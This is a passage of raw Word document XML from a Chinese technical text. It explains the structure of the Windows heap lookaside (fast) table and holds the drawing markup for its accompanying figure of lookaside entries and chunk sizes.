          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每项最多4个节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。建立快表的目的是加速堆块分配，块表中的1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-127</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>项，以8字节空间为基础，递增至1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>016</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节，快表的结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.14</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740D67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noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1243BA00" wp14:editId="4B435FDA">
                <wp:extent cx="5004435" cy="2571478"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="232" name="画布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矩形 22"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="516181" y="103496"/>
                            <a:ext cx="1335960" cy="347097"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6419CB17" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:t>lookaside[0]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246282" y="786339"/>
                            <a:ext cx="924743"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691EA5D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>16bytes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3171025" y="786339"/>
                            <a:ext cx="280643"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7DCD5" w14:textId="77777777" w:rsidR="002C1A8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连接符: 曲线 25"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipV="1">
                            <a:off x="1852107" y="607013"/>
                            <a:ext cx="283682" cy="2281"/>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矩形 26"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="516333" y="435939"/>
                            <a:ext cx="1335774" cy="346710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="40C427CD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>lookaside[</w:t>
                              </w:r>
                              <w:r>
                                <w:t>1</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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516176" y="782529"/>
                            <a:ext cx="1335774" cy="346710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3532BA10" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>lookaside[</w:t>
                              </w:r>
                              <w:r>
                                <w:t>2</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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516175" y="1115155"/>
                            <a:ext cx="1335018" cy="346710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="30BCCA84" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>lookaside[</w:t>
                              </w:r>
                              <w:r>
                                <w:t>3</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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515541" y="1457078"/>
                            <a:ext cx="1335774" cy="346075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2532037F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:ind w:firstLine="420"/>
                                <w:jc w:val="both"/>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515541" y="1803668"/>
                            <a:ext cx="1335774" cy="346075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="096CDCC3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>lookaside[</w:t>
                              </w:r>
                              <w:r>
                                <w:t>126</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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515540" y="2135659"/>
                            <a:ext cx="1335018" cy="346075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1B8569FF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>lookaside[</w:t>
                              </w:r>
                              <w:r>
                                <w:t>127</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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2135789" y="435880"/>
                            <a:ext cx="924560" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7EEC420C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>8bytes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连接符: 曲线 35"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1851806" y="955884"/>
                            <a:ext cx="394301" cy="1905"/>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矩形 36"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3695775" y="786339"/>
                            <a:ext cx="92456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0BCF9D2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>16bytes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连接符: 曲线 37"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3304422" y="955884"/>
                            <a:ext cx="391065" cy="1905"/>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矩形 38"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2247210" y="2132313"/>
                            <a:ext cx="92456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0A28B3E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>1016bytes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3171770" y="2132313"/>
                            <a:ext cx="28003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564E2C9" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>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连接符: 曲线 41"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1852875" y="2301858"/>
                            <a:ext cx="393700" cy="1905"/>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矩形 42"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3696280" y="2132313"/>
                            <a:ext cx="92392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02021892" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>1016bytes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连接符: 曲线 43"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3305120" y="2301858"/>
                            <a:ext cx="390525" cy="1905"/>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243BA00" id="画布 232" o:spid="_x0000_s1038" editas="canvas" style="width:394.05pt;height:202.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="50044,25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&#10;AK4JAAAAAA==&#10;">
                <v:shape id="_x0000_s1039" type="#_x0000_t75" style="position:absolute;width:50044;height:25711;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:rect id="矩形 22" o:spid="_x0000_s1040" style="position:absolute;left:5161;top:1034;width:13360;height:3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14:paraId="6419CB17" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:t>lookaside[0]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 23" o:spid="_x0000_s1041" style="position:absolute;left:22462;top:7863;width:924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14:paraId="7691EA5D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>16bytes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 24" o:spid="_x0000_s1042" style="position:absolute;left:31710;top:7863;width:28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textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="5A07DCD5" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="连接符: 曲线 25" o:spid="_x0000_s1043" type="#_x0000_t38" style="position:absolute;left:18521;top:6070;width:2836;height:2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omxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gRvujGg2NRV2kJBzEkTKL29Zl+TYPZtyK4m+utdQehxmJlvmPV2MI24UOdqywrmswgE&#10;cWF1zaWCPPuarkA4j6yxsUwKruRgu3kZrTHRtucDXY6+FAHCLkEFlfdtIqUrKjLoZrYlDt6f7Qz6&#10;ILtS6g77ADeNjKNoKQ3WHBYqbOmzouJ0PBsF6cfp9fZ9yH7LVb6Pfd6nP9k5VWoyHt7fQHga/H/4&#10;2d5pBfECHl/CD5CbOwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAp4UomxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:rect id="矩形 26" o:spid="_x0000_s1044" style="position:absolute;left:5163;top:4359;width:13358;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40C427CD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>lookaside[</w:t>
                        </w:r>
                        <w:r>
                          <w:t>1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 27" o:spid="_x0000_s1045" style="position:absolute;left:5161;top:7825;width:13358;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14:paraId="3532BA10" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>lookaside[</w:t>
                        </w:r>
                        <w:r>
                          <w:t>2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 28" o:spid="_x0000_s1046" style="position:absolute;left:5161;top:11151;width:1335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14:paraId="30BCCA84" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>lookaside[</w:t>
                        </w:r>
                        <w:r>
                          <w:t>3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>]</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 29" o:spid="_x0000_s1047" style="position:absolute;left:5155;top:14570;width:13358;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14:paraId="2532037F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:ind w:firstLine="420"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:t>……</w:t>
                        </w:r>
